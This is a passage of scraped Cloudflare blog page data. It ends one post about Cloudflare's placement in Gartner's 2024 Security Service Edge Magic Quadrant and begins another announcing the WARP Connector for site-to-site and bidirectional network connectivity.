user.</p><p>Most SSE solutions stop there, though, and only solve the security challenge. Team members, devices, offices, and data centers still need to connect in a way that is performant and highly available. Other SSE vendors partner with networking providers to solve that challenge while adding extra hops and latency. Cloudflare customers don’t have to compromise. Cloudflare One offers a complete <a href=\"/magic-wan-connector-general-availability\">WAN connectivity solution</a> delivered in the same data centers as our security components. Organizations can rely on a single vendor to solve how they connect and how they do so securely. No extra hops or invoices needed.</p><p>We also know that security problems do not distinguish between what happens inside your enterprise and the applications you make available to the rest of the world. You can secure and accelerate the applications that you build to serve your own customers through Cloudflare, as well. Analysts have also <a href=\"https://www.cloudflare.com/analysts/\">recognized</a> Cloudflare’s <a href=\"https://www.cloudflare.com/application-services/products/\">Web Application and API Protection (WAAP) platform</a>, which protects some of the world’s largest Internet destinations.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"how-does-that-impact-customers\">How does that impact customers?</h2>\n <a href=\"#how-does-that-impact-customers\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Tens of thousands of organizations trust Cloudflare One to secure their teams every day. And they love it. Over 200 enterprises have reviewed Cloudflare’s Zero Trust platform as part of Gartner® Peer Insights™. As mentioned previously, the feedback has been so consistently positive that Gartner named Cloudflare a <a href=\"https://www.gartner.com/reviews/market/zero-trust-network-access/vendor/cloudflare/product/cloudflare-access\">Customers’ Choice</a> for 2024.</p><p>We talk to customers directly about that feedback, and they have helped us understand <a href=\"/why-cios-select-cloudflare-one\">why CIOs and CISOs choose Cloudflare One</a>. For some teams, we offer a cost-efficient opportunity to consolidate point solutions. Others appreciate that our ease-of-use means that many practitioners have set up our platform before they even talk to our team. <a href=\"/spotlight-on-zero-trust\">We also hear that speed matters</a> to ensure a slick end user experience when we are 46% faster than Zscaler, 56% faster than Netskope, and 10% faster than Palo Alto Networks.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"whats-next\">What’s next?</h2>\n <a href=\"#whats-next\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>We kicked off 2024 with a <a href=\"https://www.cloudflare.com/security-week/\">week focused on new security features</a> that teams can begin deploying now. Looking ahead to the rest of the year, you can expect additional investment as we add depth to our Secure Web Gateway product. We also have work underway to make our industry-leading access control features even easier to use. Our largest focus areas will include our data protection platform, digital experience monitoring, and our in-line and at-rest CASB tools. And stay tuned for an overhaul to how we surface analytics and help teams meet compliance needs, too.</p><p>Our commitment to our customers in 2024 is the same as it was in 2023. We are going to continue to help your teams solve more security problems so that you can focus on your own mission.</p><p>Ready to hold us to that commitment? Cloudflare offers something unique among the leaders in this space — you can start using nearly every feature in Cloudflare One right now at no cost. Teams of up to 50 users can <a href=\"https://www.cloudflare.com/zero-trust/products/\">adopt our Zero Trustplatform for free</a>, whether for their small team or as part of a larger enterprise proof of concept. We believe that organizations of any size should be able to start their journey to deploy industry-leading security.</p><p>***</p><p><sup>1</sup>Gartner, Magic Quadrant for Security Service Edge, By Charlie Winckless, Thomas Lintemuth, Dale Koeppen, April 15, 2024</p><p><sup>2</sup>Gartner, Voice of the Customer for Zero Trust Network Access, By Peer Contributors, 30 January 2024</p><p><sup>3</sup><a href=\"https://www.gartner.com/en/information-technology/glossary/security-service-edge-sse\">https://www.gartner.com/en/information-technology/glossary/security-service-edge-sse</a></p><p>GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, MAGIC QUADRANT and PEER INSIGHTS are registered trademarks and The GARTNER PEER INSIGHTS CUSTOMERS’ CHOICE badge is a trademark and service mark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved.</p><p>Gartner® Peer Insights content consists of the opinions of individual end users based on their own experiences, and should not be construed as statements of fact, nor do they represent the views of Gartner or its a iliates. Gartner does not endorse any vendor, product or service depicted in this content nor makes any warranties, expressed or implied, with respect to this content, about its accuracy or completeness, including any warranties of merchantability or fitness for a particular purpose.</p><p>Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.</p>"],"published_at":[0,"2024-04-18T15:58:23.000+01:00"],"updated_at":[0,"2024-10-09T23:28:09.171Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ya47j6ZuQpDT2RPu1xss6/581faf5988642684f277ce5b1d813271/cloudflare-sse-gartner-magic-quadrant-2024.png"],"tags":[1,[[0,{"id":[0,"4Z2oveL0P0AeqGa5lL4Vo1"],"name":[0,"Cloudflare One"],"slug":[0,"cloudflare-one"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"3aTeFQlNgzW6UDlYoA5J63"],"name":[0,"Security Service Edge"],"slug":[0,"security-service-edge"]}],[0,{"id":[0,"3EgvWowOZCm0wiAjhuLBmF"],"name":[0,"SSE"],"slug":[0,"sse"]}],[0,{"id":[0,"41sgHc8qY4N0DiEEGw3eRq"],"name":[0,"Gartner"],"slug":[0,"gartner"]}],[0,{"id":[0,"5OywGP63AdM9Umyvaku8OP"],"name":[0,"Connectivity Cloud"],"slug":[0,"connectivity-cloud"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Sam Rhea"],"slug":[0,"sam"],"bio":[0," "],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2U8kgggIwXALYQIRjBDjyp/f71c76bd477134eab95f46d29136f902/sam.png"],"location":[0,null],"website":[0,null],"twitter":[0,"@LakeAustinBlvd"],"facebook":[0,null]}]]],"meta_description":[0,"Gartner has once again named Cloudflare to the Gartner® Magic Quadrant™ for Security Service Edge (SSE) report. We are excited to share that Cloudflare is one of only ten vendors recognized in this report. For the second year in a row, we are recognized for our ability to execute and the completeness of our vision."],"primary_author":[0,{}],"localeList":[0,{"name":[0,"Cloudflare named in 2024 Gartner® Magic Quadrant™ for Security Service Edge Config"],"enUS":[0,"English for Locale"],"zhCN":[0,"Translated for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"Translated for Locale"],"frFR":[0,"Translated for Locale"],"deDE":[0,"Translated for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"Translated for Locale"],"koKR":[0,"Translated for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"Translated for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/cloudflare-sse-gartner-magic-quadrant-2024"],"metadata":[0,{"title":[0,"Cloudflare named in 2024 Gartner® Magic Quadrant™ for Security Service Edge"],"description":[0,"Gartner has once again named Cloudflare to the Gartner® Magic Quadrant™ for Security Service Edge (SSE) report. We are excited to share that Cloudflare is one of only ten vendors recognized in this report. For the second year in a row, we are recognized for our ability to execute and the completeness of our vision."],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/o5fEkMyCP89vPSiNY2Bl3/8b9d03272db34767669e565badbbe22e/cloudflare-sse-gartner-magic-quadrant-2024-K4MB4c.png"]}]}],[0,{"id":[0,"64DSFDvFcQHNrtAi6A7jze"],"title":[0,"Introducing WARP Connector: paving the path to any-to-any connectivity"],"slug":[0,"introducing-warp-connector-paving-the-path-to-any-to-any-connectivity-2"],"excerpt":[0,"Starting today, Zero Trust administrators can deploy our new WARP Connector for simplified any-to-any connectivity"],"featured":[0,false],"html":[0,"<p></p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4EJrRp1522sGWgJ2FbWds2/6df257860be57516553e791ef6c28917/image3-30.png\" alt=\"\" class=\"kg-image\" width=\"1200\" height=\"675\" loading=\"lazy\"/>\n \n </figure><p>In the ever-evolving domain of enterprise security, <a href=\"https://www.cloudflare.com/ciso/\">CISOs</a> and CIOs have to tirelessly build new enterprise networks and maintain old ones to achieve performant any-to-any connectivity. For their team of network architects, surveying their own environment to keep up with changing needs is half the job. The other is often unearthing new, innovative solutions which integrate seamlessly into the existing landscape. This continuous cycle of construction and fortification in the pursuit of secure, flexible infrastructure is exactly what Cloudflare’s SASE offering, Cloudflare One, was built for.</p><p>Cloudflare One has progressively evolved based on feedback from customers and analysts. Today, we are thrilled to introduce the public availability of the Cloudflare WARP Connector, a new tool that makes bidirectional, site-to-site, and mesh-like connectivity even easier to secure without the need to make any disruptive changes to existing network infrastructure.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"bridging-a-gap-in-cloudflares-zero-trust-story\">Bridging a gap in Cloudflare's Zero Trust story</h2>\n <a href=\"#bridging-a-gap-in-cloudflares-zero-trust-story\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Cloudflare&#39;s approach has always been focused on offering a breadth of products, acknowledging that there is no one-size-fits-all solution for network connectivity. Our vision is simple: any-to-any connectivity, any way you want it.</p><p>Prior to the WARP Connector, one of the easiest ways to connect your infrastructure to Cloudflare, whether that be a local HTTP server, web services served by a Kubernetes cluster, or a private network segment, was through the <a href=\"https://www.cloudflare.com/products/tunnel/\">Cloudflare Tunnel</a> app connector, <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/\"><i>cloudflared</i></a>. In many cases this works great, but over time customers began to surface a long tail of use cases which could not be supported based on the underlying architecture of cloudflared. This includes situations where customers utilize VOIP phones, necessitating a SIP server to establish outgoing connections to user’s softphones, or a CI/CD server sending notifications to relevant stakeholders for each stage of the CI/CD pipelines. Later in this blog post, we explore these use cases in detail.</p><p>As <i>clouflared</i> proxies at Layer 4 of the <a href=\"https://www.cloudflare.com/learning/ddos/glossary/open-systems-interconnection-model-osi/\">OSI model</a>, its design was optimized specifically to proxy requests to origin services — it was not designed to be an active listener to handle requests from origin services. This design trade-off means that cloudflared needs to source NAT all requests it proxies to the application server. This setup is convenient for scenarios where customers don&#39;t need to update routing tables to deploy cloudflared in front of their original services. However, it also means that customers can’t see the true source IP of the client sending the requests. This matters in scenarios where a network firewall is logging all the network traffic, as the source IP of all the requests will be <i>cloudflared’s</i> IP address, causing the customer to lose visibility into the true client source.</p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2nMu5Ecf8e72QaIbf6eyiI/2e3bc3445611bd6cf0a6fa1fee96e0af/image6-10.png\" alt=\"\" class=\"kg-image\" width=\"1826\" height=\"1000\" loading=\"lazy\"/>\n \n </figure>\n <div class=\"flex anchor relative\">\n <h2 id=\"build-or-borrow\">Build or borrow</h2>\n <a href=\"#build-or-borrow\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>To solve this problem, we identified two potential solutions: start from scratch by building a new connector, or borrow from an existing connector, likely in either cloudflared or WARP.</p><p>The following table provides an overview of the tradeoffs of the two approaches:</p><!--kg-card-begin: html--><table style=\"border:none;border-collapse:collapse;table-layout:fixed;width:468pt\"><colgroup><col><col><col></colgroup><tbody><tr style=\"height:0pt\"><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Features</span></p></td><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Build in </span><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:700;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">cloudflared</span></p></td><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Borrow from WARP&nbsp;</span></p></td></tr><tr style=\"height:0pt\"><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Bidirectional traffic flows</span></p></td><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;text-align: justify;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">As described in the earlier section, limitations of Layer 4 proxying.</span></p></td><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;text-align: justify;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">This does proxying at&nbsp;</span></p><p dir=\"ltr\" style=\"line-height:1.2;text-align: justify;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Layer 3, because of which it can act as default gateway for that subnet, enabling it to support traffic flows from both directions.</span></p></td></tr><tr style=\"height:0pt\"><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">User experience</span></p></td><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;text-align: justify;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">For Cloudflare One customers, they have to work with two distinct products (cloudflared and WARP) to connect their services and users.</span></p></td><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;text-align: justify;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">For Cloudflare One customers, they just have to get familiar with a single product to connect their users as well as their networks.</span></p></td></tr><tr style=\"height:0pt\"><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Site-to-site connectivity between branches, data centers (on-premise and cloud) and headquarters.</span></p></td><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Not recommended</span></p></td><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;text-align: justify;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">For sites where running&nbsp; agents on each device is not feasible, this could easily connect the sites to users running WARP clients in other sites/branches/data centers. This would work seamlessly where the underlying tunnels are all the same.</span></p></td></tr><tr style=\"height:0pt\"><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Visibility into true source IP</span></p></td><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">It does source NATting.</span></p></td><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;text-align: justify;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Since it acts as the default gateway, it preserves the true source IP address for any traffic flow.</span></p></td></tr><tr style=\"height:0pt\"><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">High availability</span></p></td><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;text-align: justify;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Inherently reliable by </span><a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/deploy-tunnels/deploy-cloudflared-replicas/\" style=\"text-decoration:none;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#1155cc;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:underline;-webkit-text-decoration-skip:none;text-decoration-skip-ink:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">design </span></a><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">and supports replicas for failover scenarios.</span></p></td><td style=\"border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.2;text-align: justify;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Reliability specifications are very different for a default gateway use case vs endpoint device agent. Hence, there is opportunity to innovate here.&nbsp;</span></p></td></tr></tbody></table><!--kg-card-end: html-->\n <div class=\"flex anchor relative\">\n <h2 id=\"introducing-warp-connector\">Introducing WARP Connector</h2>\n <a href=\"#introducing-warp-connector\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Starting today, the introduction of WARP Connector opens up new <a href=\"https://developers.cloudflare.com/reference-architecture/sase-reference-architecture/#connecting-networks\">possibilities</a>: server initiated (SIP/VOIP) flows; site-to-site connectivity, connecting branches, headquarters, and cloud platforms; and even mesh-like networking with WARP-to-WARP. Under the hood, this new connector is an extension of warp-client that can act as a virtual router for any subnet within the network to on/off-ramp traffic through Cloudflare.</p><p>By building on WARP, we were able to take advantage of its design, where it creates a virtual network interface on the host to logically subdivide the physical interface (NIC) for the purpose of routing IP traffic. This enables us to send bidirectional traffic through the WireGuard/<a href=\"/zero-trust-warp-with-a-masque\">MASQUE</a> tunnel that’s maintained between the host and Cloudflare edge. By virtue of this architecture, customers also get the added benefit of visibility into the true source IP of the client.</p><p>WARP Connector can be easily deployed on the default gateway without any additional routing changes. Alternatively, static routes can be configured for specific CIDRs that need to be routed via WARP Connector, and the static routes can be configured on the default gateway or on every host in that subnet.</p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/WD2pig7ka0aWKGTL8EBJ0/91cedc19d8eda4f402b336e8219c958e/image2-31.png\" alt=\"\" class=\"kg-image\" width=\"1256\" height=\"674\" loading=\"lazy\"/>\n \n </figure>\n <div class=\"flex anchor relative\">\n <h2 id=\"private-network-use-cases\">Private network use cases</h2>\n <a href=\"#private-network-use-cases\" 